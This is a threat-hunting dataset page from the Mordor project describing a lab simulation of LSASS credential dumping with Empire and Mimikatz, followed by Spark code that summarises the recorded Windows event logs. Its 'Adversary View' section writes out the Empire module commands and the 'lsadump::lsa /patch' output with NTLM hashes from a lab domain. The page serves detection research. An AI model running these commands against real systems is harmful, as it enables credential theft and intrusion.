Empire Mimikatz Lsadump LSA Patch¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
[‘TA0006’] |
Techniques |
[‘T1003.001’] |
Tags |
[‘LSASS Memory Credentials Read’] |
Dataset Description¶
This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
Notebooks¶
Notebooks created by the community leveraging the mordor datasets
Author |
Name |
Link |
---|---|---|
Threat Hunter Playbook |
LSASS Access from Non System Account |
https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html |
Adversary View¶
(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*
(Empire: powershell/credentials/mimikatz/lsadump) > info
Name: Invoke-Mimikatz LSA Dump
Module: powershell/credentials/mimikatz/lsadump
NeedsAdmin: True
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
@JosephBialek
@gentilkiwi
Description:
Runs PowerSploit's Invoke-Mimikatz function to extract a
particular user hash from memory. Useful on domain
controllers.
Comments:
http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt
ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls
a
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True B7Y8G4XC Agent to run module on.
Username False Username to extract the hash for, blank
for all local passwords.
(Empire: powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked B7Y8G4XC to run TASK_CMD_JOB
[*] Agent B7Y8G4XC tasked with task ID 2
[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump
(Empire: powershell/credentials/mimikatz/lsadump) >
Job started: VGHXZ5
Hostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882
.#####. mimikatz 2.2.0 (x64) #19041 Aug 4 2020 20:16:54
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f4 (500)
User : wardog
LM :
NTLM : 42ddb2963bbe8f1c075fc869d3bce33e
RID : 000001f8 (504)
User : WDAGUtilityAccount
LM :
NTLM : 45a313f1860be24e967e55b94649aa31
(Empire: powershell/credentials/mimikatz/lsadump) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell |800 |2859 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |2505 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |279 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |162 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |150 |
|WORKSTATION5.theshire.local|Security |5156 |79 |
|MORDORDC.theshire.local |Security |4658 |64 |
|MORDORDC.theshire.local |Security |5158 |61 |
|MORDORDC.theshire.local |Security |5156 |55 |
|WORKSTATION5.theshire.local|Security |5158 |48 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |48 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |3 |38 |
|WORKSTATION6.theshire.local|Security |5156 |38 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |37 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |3 |36 |
|WORKSTATION6.theshire.local|Security |4703 |32 |
|MORDORDC.theshire.local |Security |4656 |32 |
|MORDORDC.theshire.local |Security |4663 |32 |
|MORDORDC.theshire.local |Security |4690 |32 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |10 |30 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows